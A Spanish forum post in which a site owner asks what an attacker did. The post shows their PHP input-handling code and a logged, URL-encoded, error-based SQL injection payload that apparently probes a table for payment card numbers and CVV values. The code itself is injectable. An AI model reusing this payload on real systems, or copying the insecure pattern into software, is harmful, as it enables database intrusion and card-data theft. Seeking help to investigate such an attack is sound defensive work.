Hola, muy buenas, intento acceder al foto de mySQL para publicar mi problema, pero me lleva a la principal...
El caso, he encontrado esta línea en mi log personal de la web y no se qué haceni qué han conseguido... está claro que por URL me han colado un gol, y eso que tenía esta función para proteger las variables....
Código:
function SanitizeInputSQL($dirty_input) {
$value = stripslashes($dirty_input);
$value = $this->sql->escape_string($value );
return $value;
}
Y qué hago?? cojo la QUWRY_STRING y la recorro, creando las variables automáticamente pasadas por URL
Código:
parse_str($_SERVER['QUERY_STRING'],$url);
foreach($url as $var => $value)
{
$$var='';
$$var=$site->SanitizeInputSQL($value);
}
Pero parece que estoy haciendo algo mal porque...
Código:
2020-09-17 08:04:13
SQL: SELECT imagen_promo
FROM miBD.contenidos_promos
WHERE id=1 OR (SELECT 4235 FROM(SELECT COUNT(*),CONCAT(0x7171627171,(SELECT MID((IFNULL(CAST(count(*) AS CHAR),0x20)),1,54) FROM miBD2.landingpage_conversion WHERE observaciones regexp 0x5b342d355d5b302d395d7b337d and ( observaciones regexp 0x637676 or observaciones regexp 0x637663)),0x717a706271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
ORDER BY orden ASC
mysqli_error($this->conexion): Duplicate entry 'qqbqq0qzpbq1' for key 'group_key'
archivo: /imagenes/imagen.php?blogNum=1&num=1%20OR%20%28SELECT%204235%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x7171627171%2C%28SELECT%20MID%28%28IFNULL%28CAST%28count%28%2A%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C54%29%20FROM%20miBD2.landingpage_conversion%20WHERE%20observaciones%20regexp%200x5b342d355d5b302d395d7b337d%20and%20%28%20observaciones%20regexp%200x637676%20or%20observaciones%20regexp%200x637663%29%29%2C0x717a706271%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29&mode=destaca
¿qué han insertado en mi bas de datos?? dice que la entrada 'qqbqq0qzpbq1' está duplicada....
Plis, echadme una mano para averiguar qué han hecho con esa sentencia....